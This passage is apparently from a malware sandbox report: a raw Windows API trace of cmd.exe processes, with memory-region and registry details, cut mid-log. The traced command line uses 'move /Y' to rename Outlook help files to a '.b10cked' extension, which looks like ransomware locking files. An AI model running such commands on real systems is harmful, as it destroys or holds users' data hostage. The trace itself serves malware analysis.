returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.905] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.905] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.906] _wcsicmp (_String1="MSOUTL~1.HXN", _String2=".") returned 63 [0204.906] _wcsicmp (_String1="MSOUTL~1.HXN", _String2="..") returned 63 [0204.906] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~1.hxn")) returned 0x2022 [0204.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x271e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.906] SetErrorMode (uMode=0x0) returned 0x0 [0204.906] SetErrorMode (uMode=0x1) returned 0x0 [0204.907] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", nBufferLength=0x104, lpBuffer=0x12eb74, lpFilePart=0x12eb5c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", lpFilePart=0x12eb5c*="MSOUTL~1.HXN") returned 0x27 [0204.907] 
SetErrorMode (uMode=0x0) returned 0x1 [0204.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.907] _wcsicmp (_String1="MSOUTL~1.HXN", _String2=".") returned 63 [0204.907] _wcsicmp (_String1="MSOUTL~1.HXN", _String2="..") returned 63 [0204.907] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msoutl~1.hxn")) returned 0x2022 [0204.908] SetErrorMode (uMode=0x0) returned 0x0 [0204.908] SetErrorMode (uMode=0x1) returned 0x0 [0204.908] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", nBufferLength=0x104, lpBuffer=0x12eff0, lpFilePart=0x12ed88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", lpFilePart=0x12ed88*="MSOUTL~1.HXN") returned 0x27 [0204.908] SetErrorMode (uMode=0x0) returned 0x1 [0204.908] SetErrorMode (uMode=0x0) returned 0x0 [0204.908] SetErrorMode (uMode=0x1) returned 0x0 [0204.908] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f1f8, lpFilePart=0x12ed88 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked", lpFilePart=0x12ed88*="MS.OUTLOOK.14.1033.hxn.b10cked") returned 0x39 [0204.908] SetErrorMode (uMode=0x0) returned 0x1 [0204.908] SetLastError (dwErrCode=0x0) [0204.908] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.outlook.14.1033.hxn.b10cked")) returned 0xffffffff [0204.908] GetLastError () returned 0x2 [0204.908] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e704, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e704) returned 0x260e70 [0204.908] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x12e704 | out: lpFindFileData=0x12e704) 
returned 0 [0204.909] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.909] GetLastError () returned 0x12 [0204.910] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e704, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e704) returned 0x260e70 [0204.910] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x12e704 | out: lpFindFileData=0x12e704) returned 0 [0204.910] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.910] GetLastError () returned 0x12 [0204.911] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x271be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271be0) returned 0x260e70 [0204.911] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x271be0 | out: lpFindFileData=0x271be0) returned 0 [0204.912] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.912] GetLastError () returned 0x12 [0204.912] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x271be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x271be0) returned 0x260e70 [0204.912] FindNextFileW (in: hFindFile=0x260e70, lpFindFileData=0x271be0 | out: lpFindFileData=0x271be0) returned 0 [0204.912] FindClose (in: hFindFile=0x260e70 | out: hFindFile=0x260e70) returned 1 [0204.912] GetLastError () returned 0x12 [0204.912] _get_osfhandle (_FileHandle=2) returned 0xb [0204.912] GetFileType (hFile=0xb) returned 0x2 [0204.912] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.912] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12e8d4 | out: lpMode=0x12e8d4) returned 1 [0204.913] _get_osfhandle (_FileHandle=2) returned 0xb [0204.913] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12e908 
| out: lpConsoleScreenBufferInfo=0x12e908) returned 1 [0204.913] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.914] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12e948 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.914] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12e92c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12e92c*=0x2c) returned 1 [0204.915] longjmp () [0204.915] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.915] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.915] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.915] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.915] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.915] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.916] SetConsoleInputExeNameW () returned 0x1 [0204.916] GetConsoleOutputCP () returned 0x1b5 [0204.916] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.916] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.916] exit (_Code=1) Process: id = "473" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b80" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = 
"CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29316 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29317 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29318 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29319 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 29320 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29321 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29322 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29323 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29324 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" 
Region: id = 29325 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29686 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29687 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29688 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 29689 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29690 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 29691 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29692 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29693 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29694 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29695 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = 
mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29696 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29697 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29698 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29699 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29700 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 29701 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29702 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29703 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29704 start_va = 0x70000 end_va = 0x71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 29705 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = 
"private_0x0000000000080000" filename = "" Region: id = 29706 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 29707 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 29708 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 29709 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 29975 start_va = 0x12f0000 end_va = 0x13affff entry_point = 0x12f0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 670 os_tid = 0xe4c [0202.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f96c | out: lpSystemTimeAsFileTime=0x18f96c*(dwLowDateTime=0xad4555c0, dwHighDateTime=0x1d440a9)) [0202.099] GetCurrentProcessId () returned 0xf50 [0202.099] GetCurrentThreadId () returned 0xe4c [0202.099] GetTickCount () returned 0x390c9 [0202.099] QueryPerformanceCounter (in: lpPerformanceCount=0x18f964 | out: lpPerformanceCount=0x18f964*=25888790207) returned 1 [0202.099] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.099] __set_app_type (_Type=0x1) [0202.099] __p__fmode () returned 0x76b331f4 [0202.099] __p__commode () returned 0x76b331fc [0202.099] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.099] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.100] GetCurrentThreadId () returned 0xe4c [0202.100] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, 
dwThreadId=0xe4c) returned 0x38 [0202.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.100] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.100] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.100] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.100] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f8fc | out: phkResult=0x18f8fc*=0x0) returned 0x2 [0202.100] VirtualQuery (in: lpAddress=0x18f933, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.100] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18f8cc, dwLength=0x1c | out: lpBuffer=0x18f8cc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.100] GetConsoleOutputCP () returned 0x1b5 [0202.100] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: 
lpCPInfo=0x4a9e4260) returned 1 [0202.100] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.100] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.100] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.101] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.101] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.101] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.101] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.101] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.101] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.101] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.101] GetEnvironmentStringsW () returned 0x2b0190* [0202.101] FreeEnvironmentStringsW (penv=0x2b0190) returned 1 [0202.102] GetEnvironmentStringsW () returned 0x2b0190* [0202.102] FreeEnvironmentStringsW (penv=0x2b0190) returned 1 [0202.102] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0xb8, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW 
(in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegCloseKey (hKey=0x40) returned 0x0 [0202.102] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e86c | out: phkResult=0x18e86c*=0x40) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x40, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x1, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, 
lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x0, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x4, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x4) returned 0x0 [0202.102] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18e874, lpData=0x18e878, lpcbData=0x18e870*=0x1000 | out: lpType=0x18e874*=0x0, lpData=0x18e878*=0x9, lpcbData=0x18e870*=0x1000) returned 0x2 [0202.102] RegCloseKey (hKey=0x40) returned 0x0 [0202.102] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.102] srand (_Seed=0x5b8863a4) [0202.102] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"" [0202.102] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"" [0202.103] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.103] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b18f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.103] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 
[0202.103] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.103] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.103] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.103] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.103] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.103] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.103] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.103] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.103] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.103] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.103] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.103] GetEnvironmentStringsW () returned 0x2b22e0* [0202.103] FreeEnvironmentStringsW (penv=0x2b22e0) returned 1 [0202.103] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.103] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.104] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.104] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.104] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.104] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.104] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.104] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.104] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.104] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.104] GetCurrentDirectoryW (in: nBufferLength=0x104, 
